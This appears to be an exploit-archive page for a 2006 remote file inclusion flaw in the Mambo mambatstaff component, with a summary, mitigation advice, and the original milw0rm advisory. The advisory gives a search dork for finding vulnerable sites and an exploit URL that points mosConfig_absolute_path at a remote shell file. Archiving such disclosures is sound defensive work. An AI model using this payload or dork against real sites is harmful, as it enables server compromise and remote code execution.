header-logo
Suggest Exploit
vendor:
mambatstaff Component
by:
Dr.Jr7
7,5
CVSS
HIGH
Remote Include Vulnerability
98
CWE
Product Name: mambatstaff Component
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

mambatstaff Mambo Component <= Remote Include Vulnerability

A remote include vulnerability exists in the Mambo Component mambatstaff. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing a malicious URL in the mosConfig_absolute_path parameter. This can allow the attacker to execute arbitrary code on the vulnerable system.

Mitigation:

Ensure that all user-supplied input is validated and filtered before being used in a web request. Additionally, ensure that all web requests are sent over a secure connection.
Source

Exploit-DB raw data:

# mambatstaff Mambo Component <=  Remote Include Vulnerability

# Rish : High
# Class : Remote
# Script : mambatstaff
# Thanx : www.lezr.com/vb & All kuwait hackers

# d0rkiz : allinurl:"com_mambatstaff"

#
http://www.site.com/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://shell.txt

# by Dr.Jr7

# milw0rm.com [2006-07-29]

Navigation

Suggest Exploit

Services By CQR